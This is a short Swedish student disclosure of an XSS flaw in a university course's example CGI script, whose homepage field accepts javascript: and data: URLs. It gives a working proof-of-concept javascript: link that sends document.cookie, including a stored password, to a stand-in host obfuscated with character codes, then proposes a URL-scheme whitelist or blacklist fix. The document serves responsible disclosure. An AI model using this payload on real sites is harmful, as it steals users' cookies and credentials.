Hej,

När jag arbetade med uppgift 6.2.1 hittade jag ett problem med hur
exempel scriptet hanterar "Hemsida" fältet. Det tillåter  data: och
javascript: URLer vilka kan användas för att sno cookies från de som
_klickar_på_länken_ . Det är inte  så farligt men det kan vara värt
att fixa det.

=== Info
Relevant URL: http://people.dsv.su.se/~pierre/courses/05_ass/ip2/6/6.2.1/perl/example.cgi
Se inlägg 509 (av mig)
Klassifiering: XSS

=== Proof of concept exploit
Set hemsida fältet till:
javascript:document.location=String.fromCharCode(0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x65,0x78,0x61,0x6d,0x70,0x6c,0x65,0x2f)+document.cookie

Klienter som klickar på länken gör en GET request till som ser ut
ungefär så här:
http://example/email=wiru3742%40student.su.se;%20password=[pw här]

En cracker skulle därmed kunna ta lösenord och andra cookies som finns
på servern people.dsv.su.se

=== Lösning

använd en URL parser på URLen. Checka sedan mot antingen en blacklist
eller en whitelist med URL schemes

blacklist = ['javascript','data']
if url.scheme in blacklist:
  raise Exception("url in blacklist")

eller en whitelist med bara http och https

-- 
// William Rudenmalm <w@hogman.me> <wiru3742@student.su.se>